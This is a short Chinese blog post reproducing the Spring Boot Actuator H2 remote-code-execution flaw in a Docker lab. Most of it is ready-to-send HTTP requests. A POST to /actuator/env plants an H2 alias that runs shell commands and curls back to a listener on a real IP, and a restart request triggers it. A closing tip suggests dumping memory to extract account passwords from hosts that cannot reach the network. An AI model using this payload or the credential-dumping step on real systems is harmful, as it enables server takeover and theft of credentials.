原文:Spring Boot Actuator H2 RCE複現
前端時間碰到一個Actuator 資訊洩露的然後複現了一下這個漏洞
- git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git
(2) 使用docker啟動環境
先cd進入spring-boot-actuator-h2-rce目錄然後執行以下指令
docker build -t spaceraccoon/spring-boot-rce-lab .
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab
複制
(3) 通路:http://39.105.93.185:8080/actuator
0x02 漏洞複現
(1)發送如下POST包配置spring.datasource.hikari.connection-test-query的值
POST /actuator/env HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 389
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl 39.105.93.185:8081');"}
複制
(2)檢視/actuator/env
(3)向端點 /actuator/restart 發送POST請求,重新開機應用
POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356
{}
複制
(4) 檢視nc
PS : 有些機器不出網的時候可以利用dump 擷取資訊 然後使用軟體導出賬号密碼如下:
軟體位址: 雲盤下載下傳